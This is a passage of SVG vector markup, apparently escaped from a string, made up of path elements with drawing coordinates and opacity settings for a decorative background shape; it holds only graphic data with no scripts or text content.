d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4